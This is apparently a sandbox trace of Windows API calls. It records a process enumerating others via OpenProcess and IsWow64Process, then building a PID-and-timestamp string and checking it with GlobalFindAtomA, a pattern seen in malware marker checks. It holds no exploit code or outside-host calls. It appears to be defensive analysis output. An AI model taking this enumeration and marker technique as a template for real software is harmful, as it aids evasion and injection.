	[0104.733] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.733] CloseHandle (hObject=0x694) returned 1
	[0104.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.733] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.733] CloseHandle (hObject=0x694) returned 1
	[0104.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.733] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.733] CloseHandle (hObject=0x694) returned 1
	[0104.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.770] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.770] CloseHandle (hObject=0x694) returned 1
	[0104.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.770] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.770] CloseHandle (hObject=0x694) returned 1
	[0104.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.771] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.771] CloseHandle (hObject=0x694) returned 1
	[0104.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.771] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.771] CloseHandle (hObject=0x694) returned 1
	[0104.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.771] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.771] CloseHandle (hObject=0x694) returned 1
	[0104.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.771] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.771] CloseHandle (hObject=0x694) returned 1
	[0104.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.771] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.771] CloseHandle (hObject=0x694) returned 1
	[0104.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.772] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.772] CloseHandle (hObject=0x694) returned 1
	[0104.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.772] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.772] CloseHandle (hObject=0x694) returned 1
	[0104.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.772] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.772] CloseHandle (hObject=0x694) returned 1
	[0104.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.772] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.772] CloseHandle (hObject=0x694) returned 1
	[0104.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.773] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.773] CloseHandle (hObject=0x694) returned 1
	[0104.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.773] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.773] CloseHandle (hObject=0x694) returned 1
	[0104.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.773] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.773] CloseHandle (hObject=0x694) returned 1
	[0104.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.773] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.773] CloseHandle (hObject=0x694) returned 1
	[0104.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.773] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.773] CloseHandle (hObject=0x694) returned 1
	[0104.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.774] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.774] CloseHandle (hObject=0x694) returned 1
	[0104.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.774] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.774] CloseHandle (hObject=0x694) returned 1
	[0104.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.774] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.774] CloseHandle (hObject=0x694) returned 1
	[0104.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.774] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.774] CloseHandle (hObject=0x694) returned 1
	[0104.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.774] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.774] CloseHandle (hObject=0x694) returned 1
	[0104.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.775] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.775] CloseHandle (hObject=0x694) returned 1
	[0104.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.775] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.775] CloseHandle (hObject=0x694) returned 1
	[0104.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.775] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.775] CloseHandle (hObject=0x694) returned 1
	[0104.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.775] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.775] CloseHandle (hObject=0x694) returned 1
	[0104.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.775] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.775] CloseHandle (hObject=0x694) returned 1
	[0104.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.776] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.776] CloseHandle (hObject=0x694) returned 1
	[0104.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.776] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.776] CloseHandle (hObject=0x694) returned 1
	[0104.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.776] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.776] CloseHandle (hObject=0x694) returned 1
	[0104.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.776] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.776] CloseHandle (hObject=0x694) returned 1
	[0104.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.776] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.776] CloseHandle (hObject=0x694) returned 1
	[0104.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.777] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.777] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.778] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.778] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.778] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.778] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.778] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.778] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.779] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.779] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.779] CloseHandle (hObject=0x694) returned 1
	[0104.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.779] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.779] CloseHandle (hObject=0x694) returned 1
	[0104.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.779] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.779] CloseHandle (hObject=0x694) returned 1
	[0104.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.779] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.779] CloseHandle (hObject=0x694) returned 1
	[0104.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.832] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.833] CloseHandle (hObject=0x694) returned 1
	[0104.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.833] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.833] CloseHandle (hObject=0x694) returned 1
	[0104.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.833] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.833] CloseHandle (hObject=0x694) returned 1
	[0104.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.833] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.834] CloseHandle (hObject=0x694) returned 1
	[0104.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.834] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.834] CloseHandle (hObject=0x694) returned 1
	[0104.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.834] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.834] CloseHandle (hObject=0x694) returned 1
	[0104.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.834] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.834] CloseHandle (hObject=0x694) returned 1
	[0104.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.834] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.834] CloseHandle (hObject=0x694) returned 1
	[0104.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.835] CloseHandle (hObject=0x694) returned 1
	[0104.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.835] CloseHandle (hObject=0x694) returned 1
	[0104.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.835] CloseHandle (hObject=0x694) returned 1
	[0104.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.835] CloseHandle (hObject=0x694) returned 1
	[0104.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.836] CloseHandle (hObject=0x694) returned 1
	[0104.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.836] CloseHandle (hObject=0x694) returned 1
	[0104.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.836] CloseHandle (hObject=0x694) returned 1
	[0104.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.836] CloseHandle (hObject=0x694) returned 1
	[0104.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.836] CloseHandle (hObject=0x694) returned 1
	[0104.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.837] CloseHandle (hObject=0x694) returned 1
	[0104.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.837] CloseHandle (hObject=0x694) returned 1
	[0104.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.837] CloseHandle (hObject=0x694) returned 1
	[0104.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.837] CloseHandle (hObject=0x694) returned 1
	[0104.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.838] CloseHandle (hObject=0x694) returned 1
	[0104.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.838] CloseHandle (hObject=0x694) returned 1
	[0104.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.838] CloseHandle (hObject=0x694) returned 1
	[0104.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.838] CloseHandle (hObject=0x694) returned 1
	[0104.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.839] CloseHandle (hObject=0x694) returned 1
	[0104.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.839] CloseHandle (hObject=0x694) returned 1
	[0104.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.839] CloseHandle (hObject=0x694) returned 1
	[0104.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.839] CloseHandle (hObject=0x694) returned 1
	[0104.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.839] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.839] CloseHandle (hObject=0x694) returned 1
	[0104.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.840] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.840] CloseHandle (hObject=0x694) returned 1
	[0104.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.840] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.840] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.840] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.840] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.841] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.841] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.841] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.841] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.841] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.841] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.841] CloseHandle (hObject=0x694) returned 1
	[0104.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.842] CloseHandle (hObject=0x694) returned 1
	[0104.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.842] CloseHandle (hObject=0x694) returned 1
	[0104.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.842] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.842] CloseHandle (hObject=0x694) returned 1
	[0104.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
